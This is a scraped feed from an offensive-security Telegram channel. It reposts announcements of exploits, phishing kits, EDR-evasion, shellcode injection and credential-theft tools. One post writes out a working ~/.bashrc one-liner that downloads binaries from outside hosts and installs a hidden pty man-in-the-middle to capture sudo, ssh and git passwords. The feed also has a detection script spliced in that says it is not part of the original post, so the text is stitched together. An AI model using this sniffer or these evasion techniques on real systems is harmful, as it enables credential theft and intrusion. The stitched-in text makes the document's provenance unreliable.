This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
Forwarded from 1N73LL1G3NC3
CVE-2024-1086 Linux kernel LPE

Universal local privilege escalation proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% on KernelCTF images.

A full write-up of the exploit, including background information and plenty of useful diagrams, can be found in the Flipping Pages blog post.
Evilginx ❤️ Gophish

The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.

🔗 https://breakdev.org/evilginx-3-3-go-phish/

#evilginx #gophish #phishing
Forwarded from 1N73LL1G3NC3
CVE-2024-21338

LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.

Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
Forwarded from Offensive Xwitter
😈 [ The Hacker's Choice (@[email protected]) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'


🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking


Cool, reminded me of https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
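A defender-side check for the traces this kind of rc-file hook leaves behind (the LC_PTY re-exec guard, helpers hidden under ~/.config/.pty, and `exec -a` renaming the process to look like sshd or a login shell), written as an added example that is not part of the post; the rc files it scans are constructed inline for offline testing.

```shell
#!/bin/sh
# Added example, not from the post: flag shell rc files that carry the
# pty-MitM indicators seen in the one-liner above. scan_rc_file returns 0
# when at least one indicator is present, 1 otherwise (also 1 if unreadable).
scan_rc_file() {
  f="$1"
  [ -r "$f" ] || return 1
  # Indicators: the LC_PTY re-exec guard, helpers hidden under ~/.config/.pty,
  # and exec -a spoofing the process name as "sshd: ..." or "-bash".
  grep -Eq 'LC_PTY=|\.config/\.pty/|exec -a ("sshd: |-bash)' "$f"
}

# Walk every interactive user's home directory and report hits;
# returns 0 when nothing suspicious was found, 1 otherwise.
scan_all_users() {
  hits=0
  while IFS=: read -r user _ _ _ _ home shell; do
    case "$shell" in */nologin|*/false) continue ;; esac
    for rc in "$home/.bashrc" "$home/.profile" "$home/.bash_profile"; do
      if scan_rc_file "$rc"; then
        echo "SUSPECT: $user $rc"
        hits=$((hits + 1))
      fi
    done
  done < /etc/passwd
  [ "$hits" -eq 0 ]
}

# Constructed sample rc files (one clean, one carrying the hook); prints the dir.
make_samples() {
  d=$(mktemp -d)
  printf 'alias ll="ls -l"\n' > "$d/clean.bashrc"
  printf 'alias ll="ls -l"\n' > "$d/bad.bashrc"
  printf '[ -z "$LC_PTY" ] && [ -t0 ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash bash"\n' >> "$d/bad.bashrc"
  echo "$d"
}
```

Run `scan_all_users` as root on a host to sweep every login user's rc files; a non-zero exit means at least one file matched.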
🏆 Pentest Award: an annual independent award for pentesters

The Awillix team has announced that submissions are open for the annual Pentest Award.

This is a great opportunity to showcase your achievements and demonstrate your contribution to the infosec community, as well as to share your best practical stories.

This time there will be 6 categories, with three prize places in each:

— Breaking in: web;
— Breaking in: infrastructure;
— Device;
— Hack the logic;
— One bypass, two bypass;
— Catch the fish.

The main prize is a very heavy personalized glass statuette, which, by the way, my dear snovvcrash won last year for first place.

And, of course, no less important prizes: MacBooks, iPhones, smartwatches, smart speakers, and other priceless gifts from BI.ZONE Bug Bounty and VK Bug Bounty.

#pentestaward
Forwarded from Похек (Сергей Зыбнев)
From Zero to Hero Phishing Company (ONSEC).pdf
From Zero to Hero: Phishing company
#phishing #фишинг #перевод #от_подписчика

Exclusively for the Похек channel, @resource_not_found translated this article into Russian.

🙏 Many thanks to him, and I hope you find it useful)

🌚 @poxek
Forwarded from Standoff Cyberbattle
DreamTeam member Acrono proposed to his girlfriend 😍

Let's congratulate them!
🖥 Stealthy Shellcode Injection: Exploiting Windows Fork API for Memory Manipulation

Abusing the Windows fork API and the OneDrive.exe process to inject malicious shellcode without allocating a new RWX memory region. The technique finds an existing RWX region in an already running process, in this case OneDrive.exe, writes the shellcode into that region, and executes it without calling VirtualProtect, VirtualAllocEx, or VirtualAlloc.

🚀 Steps:

— Find the OneDrive.exe in running processes;
— Get the handle of OneDrive.exe;
— Query remote process memory information;
— Look for RWX memory regions;
— Write shellcode into found region of OneDrive.exe;
— Fork OneDrive.exe into a new process;
— Set the forked process's start address to the cloned shellcode;
— Terminate the cloned process after execution.

🔗 https://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV

#winapi #onedrive #injection #maldev #cpp
🖥 Hide Cobalt-Strike like a PRO

The article outlines methods to conceal Cobalt Strike from detection by antivirus and EDR systems, with a particular focus on bypassing Kaspersky Endpoint Security. The author introduces the HCS tool for obfuscating JARM signatures and offers detailed steps for modifying Cobalt Strike's code and SSL certificates to enhance OPSEC.

🔗 https://blog.injectexp.dev/2024/02/27/hide-cobalt-strike-like-a-pro/

#cobaltstrike #customize #kaspersky #bypass
Forwarded from 1N73LL1G3NC3
Pwning the Domain: AD CS (Active Directory Certificate Services)

Domain Escalation:
• ESC1 (Template misconfiguration)
• ESC2 (Template misconfiguration)
• ESC3 (Template misconfiguration)
• ESC4 (Access Controls Attacks)
• ESC5 (Sufficient rights against several objects)
• ESC6 (CA Configuration)
• ESC7 (Sufficient rights against the CA)
• ESC8
• ESC9
• ESC10
• ESC11
• ESC12
• ESC13

Domain Persistence:
• DPERSIST1 (Forge certificates with stolen CA certificate)
• DPERSIST2
• DPERSIST3

Account Persistence:
• PERSIST1 (User account)
• PERSIST2 (Machine account)
• PERSIST3

Domain Certificate Theft:
• THEFT1 (Export user certificates with Crypto APIs)
• THEFT2 (Certificate theft via DPAPI): user certificate theft, machine certificate theft
• THEFT3
• THEFT4
• THEFT5
🖥 smbclient-ng

A fast and user-friendly way to interact with SMB shares.

🔗https://github.com/p0dalirius/smbclient-ng

#smb #smbclient #share #windows
Forwarded from Offensive Xwitter
😈 [ V❄️ @vincenzosantuc1 ]

In-memory sleeping technique using threads created in suspended state and timers that work with the ResumeThread function in order to adapt SWAPPALA to the Reflective DLL context.

🔗 https://oldboy21.github.io/posts/2024/06/sleaping-issues-swappala-and-reflective-dll-friends-forever/

🔐 Spray Passwords, Avoid Lockouts

In this blog post, learn how to effectively use password spraying in Active Directory environments without triggering account lockouts. Dive into authentication mechanisms, password policies, GPO and PSOs.

Research
🔗 https://en.hackndo.com/password-spraying-lockout/

Tool
🔗 https://github.com/login-securite/conpass

#ad #spraying #passpol
🖥 Veeam Enterprise Manager Authentication Bypass

On May 21st, Veeam published an advisory stating that all versions before Veeam Backup Enterprise Manager 12.1.2.172 are affected by an authentication bypass that allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. The CVSS score for this vulnerability is 9.8.

🔗 Source:
https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/

🔗 PoC:
https://github.com/sinsinology/CVE-2024-29849

#veeam #authentication #bypass #cve
🌐 DLHell

DLHell is a tool for performing local and remote DCOM Windows DLL proxying. It can intercept DLLs on remote objects to execute arbitrary commands. The tool supports various authentication methods and provides capabilities for local and remote DLL proxying, as well as DCOM DLL proxying.

🔗 Source:
https://github.com/synacktiv/DLHell

#windows #dll #proxing #dcom
🖥 Assembly for Hackers

"Assembly Unleashed: A Hacker's Handbook" is a definitive resource tailored specifically for hackers and security researchers seeking to master the art of assembly programming language. Authored by seasoned practitioners in the field, this book offers a comprehensive journey into the depths of assembly, unraveling its complexities and exposing its potential for exploitation and defense.

🔗 Source:
https://redteamrecipe.com/assembly-for-hackers

#asm #syscalls #dll #apc #injection #redteam
🔑 RdpStrike

The project aims to extract clear-text passwords from mstsc.exe; the shellcode uses hardware breakpoints to hook APIs. It is fully position-independent code, and once injected into the mstsc.exe process it sets hardware breakpoints on three different APIs, ultimately capturing any clear-text credentials and saving them to a file.

🔗 Source:
https://github.com/0xEr3bus/RdpStrike

#rdp #creds #bof #cobaltstrike